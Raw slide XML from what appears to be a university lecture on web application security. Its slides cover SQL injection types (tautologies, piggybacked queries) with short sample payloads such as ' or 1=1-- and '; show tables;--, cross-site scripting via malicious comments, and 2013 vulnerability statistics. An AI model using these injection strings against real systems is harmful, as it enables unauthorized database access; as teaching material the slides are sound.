                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Tautologies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Anley</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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2001)</a:t>
            </a:r>
            <a:endParaRPr sz="20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445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1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-12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‐‐</a:t>
            </a:r>
            <a:endParaRPr sz="18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430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1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>'greg' </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="409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'%gr%’</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1280"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Piggybacked queries (Halfond</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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2005)</a:t>
            </a:r>
            <a:endParaRPr sz="20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445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1800" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>show </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tables;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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‐‐</a:t>
            </a:r>
            <a:endParaRPr sz="18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673605" y="578611"/>
            <a:ext cx="648462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Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="160" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerabilities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24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93902" y="1447292"/>
            <a:ext cx="7975600" cy="30867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7020" marR="474345" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>contents </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-330" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>invalidated  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:endParaRPr sz="26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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="38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BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>interpreted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>valid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-434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tags</a:t>
            </a:r>
            <a:endParaRPr sz="26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585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2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The intended </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-43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alters</a:t>
            </a:r>
            <a:endParaRPr sz="24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575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2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Visible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>symptoms </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(pop‐up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-29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window)</a:t>
            </a:r>
            <a:endParaRPr sz="24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575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2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Invisible symptoms (reading form </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>fields,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-254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cookies)</a:t>
            </a:r>
            <a:endParaRPr sz="24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609342" y="616711"/>
            <a:ext cx="575500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Posting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a benign </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>comment </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="125" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1306829"/>
            <a:ext cx="7943850" cy="50939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273044" y="6419341"/>
            <a:ext cx="39173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solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a: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JSP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Blog</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://sourceforge.net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066800" y="1828800"/>
            <a:ext cx="2438400" cy="18288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25</a:t>
            </a:fld>
            <a:endParaRPr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136901" y="616711"/>
            <a:ext cx="586232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Viewing </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a benign </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>comment </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="125" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="1551432"/>
            <a:ext cx="7239000" cy="36195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26</a:t>
            </a:fld>
            <a:endParaRPr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937257" y="616711"/>
            <a:ext cx="618553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Posting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>comment </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637794" y="1548383"/>
            <a:ext cx="8362950" cy="39624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27</a:t>
            </a:fld>
            <a:endParaRPr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959355" y="616711"/>
            <a:ext cx="629285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Viewing </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>comment </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="1309877"/>
            <a:ext cx="6934200" cy="515340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28</a:t>
            </a:fld>
            <a:endParaRPr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45055" y="616711"/>
            <a:ext cx="629285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Viewing </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>comment </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="1438655"/>
            <a:ext cx="7239000" cy="48958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98702" y="2233676"/>
            <a:ext cx="3128645" cy="3118485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287020" marR="243204" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="66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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cross‐Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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Scripting  (XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="5080" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-125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attacker’s  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>victim’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55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browser</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="53975" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Visible (pop‐up  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>window) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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invisible  symptoms (accessing  sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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information)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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29</a:t>
            </a:fld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31339" y="616711"/>
            <a:ext cx="62464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45" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>application security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerability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094216" y="6805633"/>
            <a:ext cx="135890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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr sz="12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3902" y="1424432"/>
            <a:ext cx="8049259" cy="5142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10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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>White </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>hat security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>report</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-32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(2013)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30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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>86%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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had</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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serious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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vulnerability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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="344805" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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gathered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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thousands</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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from  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>than </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>650</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-165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organizations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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="345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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>average</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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number</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-3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vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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per</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-16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website</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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56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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320"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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Serious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>resolved</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>average</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="4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193</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>days  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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notification.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</a:pPr>
            <a:endParaRPr sz="2850">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="509270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://info.whitehatsec.com/2013‐website‐security‐report.html</a:t>
            </a:r>
            <a:endParaRPr sz="18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740661" y="616711"/>
            <a:ext cx="665353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Posting </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
